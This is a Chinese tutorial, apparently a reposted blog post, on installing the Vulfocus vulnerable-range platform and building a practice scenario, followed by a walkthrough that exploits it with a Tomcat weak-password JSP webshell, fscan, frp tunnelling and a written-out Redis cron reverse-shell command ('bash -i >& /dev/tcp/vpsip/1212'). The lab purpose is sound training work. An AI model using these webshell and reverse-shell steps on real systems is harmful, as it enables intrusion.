【靶场】vulfocus搭建和场景编排 您所在的位置:网站首页 靶场测试工是什么工种啊 【靶场】vulfocus搭建和场景编排

【靶场】vulfocus搭建和场景编排

2024-03-26 08:55| 来源: 网络整理| 查看: 265

前言

Vulfocus 是一个漏洞集成平台,将漏洞环境 docker 镜像,放入即可使用,开箱即用,这里我们搭建在云服务器上,需要高一点的配置,搭建可以按需搭建本地和自己的服务器上,我们主要使用场景编排功能进行内网突破训练,多重内网的穿透等。

一、搭建

vulfocus:https://github.com/fofapro/vulfocus 在这里插入图片描述 在服务器中已经安装docker:直接拉取镜像到本地

docker pull vulfocus/vulfocus:latest

拉取成功 在这里插入图片描述 启动容器:

将自己的IP替换xx.xx.xx.xx docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=xx.xx.xx.xx vulfocus/vulfocus

访问web界面: 默认用户名密码为admin: 在这里插入图片描述 这里是公网服务器所以改密码: 在这里插入图片描述

二、使用

我们需要下载文件才能进行使用: 在这里插入图片描述 下载需要的镜像文件: 下载完成后在docker images中可以看到

在这里插入图片描述 我们使用这几个镜像编排一个简单场景题:

三、场景靶场编排

先添加网卡作为内网使用: 在这里插入图片描述 这里我添加一个network3的网卡: 在这里插入图片描述 添加场景: 在这里插入图片描述 在这里插入图片描述 这里注意需要拖出来不能点: 在这里插入图片描述 在这里插入图片描述 选择我们刚才下载的镜像文件: 在这里插入图片描述 这里我们用tomcat弱密码作为边缘机也就是外网可以访问到的服务器: 在这里插入图片描述 网卡使用network3: 在这里插入图片描述 第二台给一个redis的未授权访问漏洞作为内网靶机:

注意:这里是否开放这里不选(不选就作为内网) 在这里插入图片描述 我们这里将图片截图保存一下: 在这里插入图片描述 在这里插入图片描述 写一个描述: 在这里插入图片描述 发布靶场: 在这里插入图片描述 在这里插入图片描述 在这里插入图片描述 这里是公网的地址码一下: 在这里插入图片描述 访问靶场: 在这里插入图片描述 这里我们的搭建过程就好了,就可以叫上小伙伴一起打靶场了。

四、靶场实战

这里是tomcat弱密码直接上传jsp马: 注意jsp马需要压缩为zip后将后缀改为war包才能上传 在这里插入图片描述 访问一下马: 在这里插入图片描述 直接用冰蝎连接: 用的默认密码: 在这里插入图片描述 拿到第一个flag: 在这里插入图片描述 看一下权限: 在这里插入图片描述 然后在找其他flag: 查一下内网ip 在这里插入图片描述 上传一个fscan作信息搜集: 在这里插入图片描述 扫描一下内网: 在这里插入图片描述 扫描完成后会生成一个文件 在这里插入图片描述 可以看到另外两台内网: 在这里插入图片描述 我们简单用冰蝎做个内穿(不稳定): 在这里插入图片描述

在这里插入图片描述 开个kali使用redis的cli连接测试: 注意我本机地址为10.102.114.135也就是上面映射Windows11的地址,因为kali是虚拟机所以这里需要修改为本机ip 在这里插入图片描述 这里我们使用任务计划反弹shell,准备一台vps(公网IP): 监听端口: 在这里插入图片描述 使用redis-cli写入任务计划:

redis-cli -h 10.102.114.135 这里替换vpsip和端口 set x "\n* * * * * bash -i >& /dev/tcp/vpsip/1212 0>&1\n" config set dir /var/spool/cron/ config set dbfilename root save

发现无法写入进入容器查看: 在这里插入图片描述 发现没有装任务计划程序: 第二种方式写入webshell,发现也灭有装web服务我先装一个任务计划,不然没法实现: 在这里插入图片描述 apt-get源无法使用,这下这两种方式就不行了,换源后出现新问题放弃使用这种方式: 这里放弃这种代理方式使用frp搭建隧道实现本机可以访问redis: 使用云主机搭建frp server 在这里插入图片描述

启动 .\frps -c frps.ini

利用冰蝎上传frpc 在这里插入图片描述 写配置: 在这里插入图片描述 本地使用代理访问: 这里是公网ip 在这里插入图片描述 访问一下内网服务:使用内网ip访问 成功打通第一层隧道 在这里插入图片描述 在这里插入图片描述

接下来就可以使用poc去测试了。

五、总结

构建的场景中的主要选一下比较新的漏洞,不然会出现横向移动很麻烦,还有一些漏洞需要回显,可能就会出现一些问题导致无法无法成功,建议场景搭建好后测试一下可行性,因为是docker可能会有一些命令无法使用,这也会造成一些困难。



【本文地址】

公司简介

联系我们

今日新闻

    推荐新闻

    专题文章
      CopyRight 2018-2019 实验室设备网 版权所有